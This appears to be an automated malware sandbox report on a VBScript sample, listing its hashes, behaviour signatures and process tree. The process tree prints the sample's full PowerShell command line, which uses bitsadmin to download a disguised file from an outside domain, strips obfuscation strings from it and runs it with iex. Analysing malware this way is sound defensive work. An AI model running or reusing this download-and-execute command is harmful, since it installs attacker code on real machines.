Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
01/06/2023, 13:52
230601-q6laesee79 601/06/2023, 13:51
230601-q6be8aeh6y 601/06/2023, 13:49
230601-q4w9xaeh6v 601/06/2023, 13:48
230601-q4bcfaeh51 601/06/2023, 13:45
230601-q2vy3aee58 601/06/2023, 13:42
230601-qz6msaeh5t 725/05/2022, 10:04
220525-l3xrtsdfbm 7Analysis
-
max time kernel
55s -
max time network
63s -
platform
windows10-1703_x64 -
resource
win10-20230220-en -
resource tags
arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system -
submitted
01/06/2023, 13:42
Behavioral task
behavioral1
Sample
fisc.vbs
Resource
win10-20230220-en
Behavioral task
behavioral2
Sample
ykfoxibh.pdf
Resource
win10-20230220-en
General
-
Target
fisc.vbs
-
Size
607B
-
MD5
7e9280027235462727a9a351429725c6
-
SHA1
380f1b3eeb2779a4359e4ca52471273983ed684c
-
SHA256
11a9b5a24b628be56d2d2bedf1ed71f05114c2f670cd1814ff8f8ff222cd801a
-
SHA512
7e31dcff6590b79476bb9bedd73145b9acafea62202d8defdd12608eae4cf727dce8781b83cd14d51432f2989bc6376c0a5bb8a114397c504a1ea4d519b4e060
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000\Control Panel\International\Geo\Nation WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Download via BitsAdmin 1 TTPs 1 IoCs
pid Process 4688 bitsadmin.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance WScript.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 1452 powershell.exe 1452 powershell.exe 1452 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1452 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2476 wrote to memory of 1484 2476 WScript.exe 66 PID 2476 wrote to memory of 1484 2476 WScript.exe 66 PID 1484 wrote to memory of 1452 1484 cmd.exe 68 PID 1484 wrote to memory of 1452 1484 cmd.exe 68 PID 1452 wrote to memory of 4688 1452 powershell.exe 69 PID 1452 wrote to memory of 4688 1452 powershell.exe 69
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fisc.vbs"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2476 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c powershell -c "&{bitsadmin /transfer orhwgxcl https://jopkerto.tech/avatar/6735/production.jpeg C:\Users\Admin\AppData\Roaming\production.jpeg; $ah=gc C:\Users\Admin\AppData\Roaming\production.jpeg; $ah -replace 'rfkvkhyy|wvgpmnbgx|xhbtegpohq|evvdwlxcd|gisofqvjp|edvdpyzc|uqbykfuhv' |iex }"2⤵
- Suspicious use of WriteProcessMemory
PID:1484 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c "&{bitsadmin /transfer orhwgxcl https://jopkerto.tech/avatar/6735/production.jpeg C:\Users\Admin\AppData\Roaming\production.jpeg; $ah=gc C:\Users\Admin\AppData\Roaming\production.jpeg; $ah -replace 'rfkvkhyy|wvgpmnbgx|xhbtegpohq|evvdwlxcd|gisofqvjp|edvdpyzc|uqbykfuhv' |iex }"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1452 -
C:\Windows\system32\bitsadmin.exe"C:\Windows\system32\bitsadmin.exe" /transfer orhwgxcl https://jopkerto.tech/avatar/6735/production.jpeg C:\Users\Admin\AppData\Roaming\production.jpeg4⤵
- Download via BitsAdmin
PID:4688
-
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:700
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s fdPHost1⤵PID:5020
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
652B
MD5671edceeceed4b8d01725b17bb334014
SHA1f1b1e5909d6cb622c6133c92c775e022c7fb0edb
SHA25693d8ed1c1a490a5384e0d19a399e95b60f67880af242cf77955e8f53202adcf8
SHA5121ff5f1549a01cb21e7ab285acd9c4fea328693a66375f5effbd89f577c4557b4a7eb4722de8d084b46012fce3d05bfe2f42ba639f895e2d089bc52db517d8722